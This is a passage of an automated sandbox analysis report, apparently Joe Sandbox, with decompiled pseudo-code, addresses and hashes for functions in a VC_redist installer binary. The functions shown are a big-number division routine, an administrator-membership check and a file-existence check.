				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00059E20(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00059BF0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0003E080(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0003E080(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x4b9cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00059BF0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0004BBFA(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0004BBFA(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0004BBFA(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                                                                          0x0004a3bc
                                                                          0x0004a3bf
                                                                          0x0004a3c3
                                                                          0x0004a3cd
                                                                          0x0004a3d0
                                                                          0x0004a3d2
                                                                          0x0004a3d4
                                                                          0x0004a3e1
                                                                          0x0004a3e1
                                                                          0x0004a3e4
                                                                          0x0004a3e4
                                                                          0x0004a3e7
                                                                          0x0004a3ea
                                                                          0x0004a3ec
                                                                          0x0004a51f
                                                                          0x0004a521
                                                                          0x0004a56a
                                                                          0x0004a56e
                                                                          0x0004a574
                                                                          0x0004a523
                                                                          0x0004a525
                                                                          0x0004a528
                                                                          0x0004a52a
                                                                          0x0004a52d
                                                                          0x0004a52f
                                                                          0x0004a531
                                                                          0x0004a565
                                                                          0x0004a565
                                                                          0x0004a565
                                                                          0x0004a533
                                                                          0x0004a538
                                                                          0x0004a53e
                                                                          0x0004a53e
                                                                          0x0004a541
                                                                          0x0004a543
                                                                          0x0004a545
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a547
                                                                          0x0004a548
                                                                          0x0004a54b
                                                                          0x0004a54e
                                                                          0x0004a550
                                                                          0x00000000
                                                                          0x0004a552
                                                                          0x00000000
                                                                          0x0004a552
                                                                          0x00000000
                                                                          0x0004a550
                                                                          0x0004a554
                                                                          0x0004a55b
                                                                          0x0004a55f
                                                                          0x0004a563
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a563
                                                                          0x0004a566
                                                                          0x0004a566
                                                                          0x0004a568
                                                                          0x0004a575
                                                                          0x0004a578
                                                                          0x0004a57b
                                                                          0x0004a57e
                                                                          0x0004a57e
                                                                          0x0004a582
                                                                          0x0004a585
                                                                          0x0004a588
                                                                          0x0004a58b
                                                                          0x0004a596
                                                                          0x0004a58d
                                                                          0x0004a592
                                                                          0x0004a592
                                                                          0x0004a5a0
                                                                          0x0004a5a5
                                                                          0x0004a5a8
                                                                          0x0004a5aa
                                                                          0x0004a5b4
                                                                          0x0004a5b7
                                                                          0x0004a5be
                                                                          0x0004a5c1
                                                                          0x0004a5c4
                                                                          0x0004a5cc
                                                                          0x0004a5d2
                                                                          0x0004a5d2
                                                                          0x0004a5d2
                                                                          0x0004a5d2
                                                                          0x0004a5c4
                                                                          0x0004a5d7
                                                                          0x0004a5de
                                                                          0x0004a5de
                                                                          0x0004a5e1
                                                                          0x0004a5e4
                                                                          0x0004a816
                                                                          0x0004a816
                                                                          0x0004a5ea
                                                                          0x0004a5ea
                                                                          0x0004a5f0
                                                                          0x0004a5f3
                                                                          0x0004a5f6
                                                                          0x0004a5f9
                                                                          0x0004a5fc
                                                                          0x0004a5ff
                                                                          0x0004a602
                                                                          0x0004a602
                                                                          0x0004a605
                                                                          0x0004a60c
                                                                          0x0004a60c
                                                                          0x0004a607
                                                                          0x0004a607
                                                                          0x0004a607
                                                                          0x0004a60e
                                                                          0x0004a612
                                                                          0x0004a615
                                                                          0x0004a617
                                                                          0x0004a61a
                                                                          0x0004a621
                                                                          0x0004a624
                                                                          0x0004a627
                                                                          0x0004a632
                                                                          0x0004a635
                                                                          0x0004a63a
                                                                          0x0004a63f
                                                                          0x0004a646
                                                                          0x0004a64b
                                                                          0x0004a64d
                                                                          0x0004a64f
                                                                          0x0004a653
                                                                          0x0004a656
                                                                          0x0004a659
                                                                          0x0004a661
                                                                          0x0004a66a
                                                                          0x0004a66a
                                                                          0x0004a66c
                                                                          0x0004a66f
                                                                          0x0004a66f
                                                                          0x0004a659
                                                                          0x0004a679
                                                                          0x0004a67e
                                                                          0x0004a683
                                                                          0x0004a685
                                                                          0x0004a688
                                                                          0x0004a68a
                                                                          0x0004a68d
                                                                          0x0004a690
                                                                          0x0004a692
                                                                          0x0004a695
                                                                          0x0004a698
                                                                          0x0004a69a
                                                                          0x0004a6a1
                                                                          0x0004a6a6
                                                                          0x0004a6a9
                                                                          0x0004a6b3
                                                                          0x0004a6b5
                                                                          0x0004a6b7
                                                                          0x0004a6ba
                                                                          0x0004a6ba
                                                                          0x0004a6bc
                                                                          0x0004a6bf
                                                                          0x0004a6c2
                                                                          0x0004a6c5
                                                                          0x0004a6c8
                                                                          0x0004a69c
                                                                          0x0004a69c
                                                                          0x0004a69f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a69f
                                                                          0x0004a6cb
                                                                          0x0004a6cd
                                                                          0x0004a6cf
                                                                          0x00000000
                                                                          0x0004a6d1
                                                                          0x0004a6d1
                                                                          0x0004a6d4
                                                                          0x0004a6d6
                                                                          0x0004a6d6
                                                                          0x0004a6e4
                                                                          0x0004a6e7
                                                                          0x0004a6ec
                                                                          0x0004a6ee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a6f0
                                                                          0x0004a6f7
                                                                          0x0004a6f7
                                                                          0x0004a6fa
                                                                          0x0004a6fd
                                                                          0x0004a700
                                                                          0x0004a703
                                                                          0x0004a703
                                                                          0x0004a706
                                                                          0x0004a709
                                                                          0x0004a70d
                                                                          0x0004a710
                                                                          0x0004a712
                                                                          0x0004a715
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a717
                                                                          0x0004a715
                                                                          0x0004a6f2
                                                                          0x0004a6f2
                                                                          0x0004a6f5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a6f5
                                                                          0x0004a71c
                                                                          0x0004a71c
                                                                          0x00000000
                                                                          0x0004a71c
                                                                          0x0004a719
                                                                          0x00000000
                                                                          0x0004a719
                                                                          0x0004a6d4
                                                                          0x0004a6cf
                                                                          0x0004a71f
                                                                          0x0004a71f
                                                                          0x0004a721
                                                                          0x0004a72b
                                                                          0x0004a72b
                                                                          0x0004a72e
                                                                          0x0004a730
                                                                          0x0004a732
                                                                          0x0004a734
                                                                          0x0004a739
                                                                          0x0004a73c
                                                                          0x0004a73c
                                                                          0x0004a73f
                                                                          0x0004a742
                                                                          0x0004a745
                                                                          0x0004a747
                                                                          0x0004a75c
                                                                          0x0004a75e
                                                                          0x0004a760
                                                                          0x0004a762
                                                                          0x0004a764
                                                                          0x0004a766
                                                                          0x0004a768
                                                                          0x0004a76a
                                                                          0x0004a76d
                                                                          0x0004a76d
                                                                          0x0004a771
                                                                          0x0004a773
                                                                          0x0004a779
                                                                          0x0004a77c
                                                                          0x0004a77c
                                                                          0x0004a77c
                                                                          0x0004a780
                                                                          0x0004a780
                                                                          0x0004a785
                                                                          0x0004a788
                                                                          0x0004a788
                                                                          0x0004a78d
                                                                          0x0004a78f
                                                                          0x0004a791
                                                                          0x0004a798
                                                                          0x0004a798
                                                                          0x0004a79a
                                                                          0x0004a79f
                                                                          0x0004a7a1
                                                                          0x0004a7a4
                                                                          0x0004a7a4
                                                                          0x0004a7a7
                                                                          0x0004a7b0
                                                                          0x0004a7b0
                                                                          0x0004a7b2
                                                                          0x0004a7b2
                                                                          0x0004a7b7
                                                                          0x0004a7bd
                                                                          0x0004a7c1
                                                                          0x0004a7c4
                                                                          0x0004a7c7
                                                                          0x0004a7c9
                                                                          0x0004a7c9
                                                                          0x0004a7c9
                                                                          0x0004a7ce
                                                                          0x0004a7ce
                                                                          0x0004a7d1
                                                                          0x0004a7d4
                                                                          0x0004a793
                                                                          0x0004a793
                                                                          0x0004a796
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a796
                                                                          0x0004a791
                                                                          0x0004a7db
                                                                          0x0004a7db
                                                                          0x0004a7dc
                                                                          0x0004a723
                                                                          0x0004a723
                                                                          0x0004a725
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a725
                                                                          0x0004a7ec
                                                                          0x0004a7f1
                                                                          0x0004a7f4
                                                                          0x0004a7f8
                                                                          0x0004a7f9
                                                                          0x0004a7fc
                                                                          0x0004a7ff
                                                                          0x0004a800
                                                                          0x0004a803
                                                                          0x0004a806
                                                                          0x0004a809
                                                                          0x0004a80c
                                                                          0x0004a80c
                                                                          0x0004a814
                                                                          0x0004a81b
                                                                          0x0004a81c
                                                                          0x0004a81e
                                                                          0x0004a820
                                                                          0x0004a822
                                                                          0x0004a825
                                                                          0x0004a830
                                                                          0x0004a830
                                                                          0x0004a836
                                                                          0x0004a836
                                                                          0x0004a839
                                                                          0x0004a83a
                                                                          0x0004a83a
                                                                          0x0004a830
                                                                          0x0004a83e
                                                                          0x0004a840
                                                                          0x0004a842
                                                                          0x0004a844
                                                                          0x0004a844
                                                                          0x0004a846
                                                                          0x0004a84a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a84c
                                                                          0x0004a84c
                                                                          0x0004a84f
                                                                          0x0004a851
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a851
                                                                          0x0004a844
                                                                          0x0004a853
                                                                          0x0004a85d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a568
                                                                          0x0004a3f2
                                                                          0x0004a3f2
                                                                          0x0004a3f2
                                                                          0x0004a3f5
                                                                          0x0004a3f8
                                                                          0x0004a3fb
                                                                          0x0004a42c
                                                                          0x0004a42e
                                                                          0x0004a479
                                                                          0x0004a47b
                                                                          0x0004a482
                                                                          0x0004a489
                                                                          0x0004a48c
                                                                          0x0004a48f
                                                                          0x0004a495
                                                                          0x0004a495
                                                                          0x0004a496
                                                                          0x0004a499
                                                                          0x0004a4a0
                                                                          0x0004a4a9
                                                                          0x0004a4ae
                                                                          0x0004a4b1
                                                                          0x0004a4b6
                                                                          0x0004a4b9
                                                                          0x0004a4bb
                                                                          0x0004a4c0
                                                                          0x0004a4c3
                                                                          0x0004a4c6
                                                                          0x0004a4c6
                                                                          0x0004a4c6
                                                                          0x0004a4ca
                                                                          0x0004a4cd
                                                                          0x0004a4cd
                                                                          0x0004a4d2
                                                                          0x0004a4d2
                                                                          0x0004a4dd
                                                                          0x0004a4e8
                                                                          0x0004a4e8
                                                                          0x0004a4eb
                                                                          0x0004a4f7
                                                                          0x0004a4fc
                                                                          0x0004a507
                                                                          0x0004a509
                                                                          0x0004a50b
                                                                          0x0004a511
                                                                          0x0004a516
                                                                          0x0004a518
                                                                          0x0004a51e
                                                                          0x0004a430
                                                                          0x0004a43c
                                                                          0x0004a43c
                                                                          0x0004a43f
                                                                          0x0004a44f
                                                                          0x0004a455
                                                                          0x0004a45c
                                                                          0x0004a45e
                                                                          0x0004a466
                                                                          0x0004a468
                                                                          0x0004a46a
                                                                          0x0004a46f
                                                                          0x0004a472
                                                                          0x0004a478
                                                                          0x0004a478
                                                                          0x0004a3fd
                                                                          0x0004a400
                                                                          0x0004a404
                                                                          0x0004a40a
                                                                          0x0004a419
                                                                          0x0004a423
                                                                          0x0004a42b
                                                                          0x0004a42b
                                                                          0x0004a3fb
                                                                          0x0004a3d6
                                                                          0x0004a3d9
                                                                          0x0004a3df
                                                                          0x0004a3df
                                                                          0x0004a3c5
                                                                          0x0004a3cb
                                                                          0x0004a3cb

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
                                                                          • Instruction ID: 90021db77806623d92bf5d44a92003072cfe45c7b7ca63ddf17f4b617c11dd5e
                                                                          • Opcode Fuzzy Hash: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
                                                                          • Instruction Fuzzy Hash: ED024DB1E402199FDF24CFA9C9806ADB7F1EF89314F258169D819E7380D731AE41CB85
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005393B Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E0005393B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, int* _a4) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				char _v24;
				void* __ebp;
				signed int _t15;
				int _t21;
				void* _t27;
				void* _t31;
				void* _t32;
				int* _t34;
				void* _t35;
				signed int _t36;

				_t32 = __edi;
				_t31 = __edx;
				_t15 =  *0x7a008; // 0xfbf51acb
				_v8 = _t15 ^ _t36;
				_push(__ebx);
				_push(__esi);
				_t34 = _a4;
				_v12 = 0x500;
				_v24 = 0;
				_v16.Value = 0;
				_v20 = 0;
				E00053AC9(__ecx,  &_v24);
				if(_v24 == 0) {
					_t21 = AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v20);
					 *_t34 = _t21;
					if(_t21 != 0) {
						__imp__CheckTokenMembership(0, _v20, _t34);
						if(_t21 == 0) {
							 *_t34 = 0;
						}
					}
				} else {
					 *_t34 = 1;
				}
				_pop(_t35);
				_pop(_t27);
				if(_v20 != 0) {
					E000554EF(_v20);
				}
				return E0003DE36(_t27, _v8 ^ _t36, _t31, _t32, _t35);
			}

















                                                                          0x0005393b
                                                                          0x0005393b
                                                                          0x00053941
                                                                          0x00053948
                                                                          0x0005394b
                                                                          0x0005394c
                                                                          0x0005394d
                                                                          0x00053955
                                                                          0x0005395c
                                                                          0x0005395f
                                                                          0x00053962
                                                                          0x00053965
                                                                          0x0005396d
                                                                          0x0005398e
                                                                          0x00053994
                                                                          0x00053998
                                                                          0x0005399f
                                                                          0x000539a7
                                                                          0x000539a9
                                                                          0x000539a9
                                                                          0x000539a7
                                                                          0x0005396f
                                                                          0x0005396f
                                                                          0x0005396f
                                                                          0x000539af
                                                                          0x000539b0
                                                                          0x000539b1
                                                                          0x000539b6
                                                                          0x000539b6
                                                                          0x000539ca

                                                                          APIs
                                                                            • Part of subcall function 00053AC9: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,0005396A,?), ref: 00053B3A
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0005398E
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0005399F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 2114926846-0
                                                                          • Opcode ID: 5d34a06a34b173e3a232f4c067080c218476c8aa80c2081421899c7f7b3feb88
                                                                          • Instruction ID: 3833a4ee62a53a027ec9d9c834a2482db7ec4ca43c8c15fab330033754d0d96d
                                                                          • Opcode Fuzzy Hash: 5d34a06a34b173e3a232f4c067080c218476c8aa80c2081421899c7f7b3feb88
                                                                          • Instruction Fuzzy Hash: 1B111EB190031AAFDB20DFA5DC85ABFBBF8FF08346F50482DA945A6181D7749A48CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054315 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00054315(WCHAR* _a4, signed char* _a8) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t15;
				signed char _t19;
				signed char* _t20;
				void* _t23;
				void* _t24;
				signed int _t27;

				_t10 =  *0x7a008; // 0xfbf51acb
				_v8 = _t10 ^ _t27;
				_t20 = _a8;
				_t26 = _a4;
				_t24 = 0;
				E0003F670(0,  &_v600, 0, 0x250);
				_t15 = FindFirstFileW(_a4,  &_v600);
				if(_t15 != 0xffffffff) {
					FindClose(_t15);
					_t19 = _v600.dwFileAttributes;
					if((_t19 & 0x00000010) == 0) {
						if(_t20 != 0) {
							 *_t20 = _t19;
						}
						_t24 = 1;
					}
				}
				return E0003DE36(_t20, _v8 ^ _t27, _t23, _t24, _t26);
			}
















                                                                          0x0005431e
                                                                          0x00054325
                                                                          0x00054329
                                                                          0x00054333
                                                                          0x0005433c
                                                                          0x00054340
                                                                          0x00054350
                                                                          0x00054359
                                                                          0x0005435c
                                                                          0x00054362
                                                                          0x0005436a
                                                                          0x0005436e
                                                                          0x00054370
                                                                          0x00054370
                                                                          0x00054374
                                                                          0x00054374
                                                                          0x0005436a
                                                                          0x00054387

                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00038FFA,?,000002C0,00000000,00000000), ref: 00054350
                                                                          • FindClose.KERNEL32(00000000), ref: 0005435C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
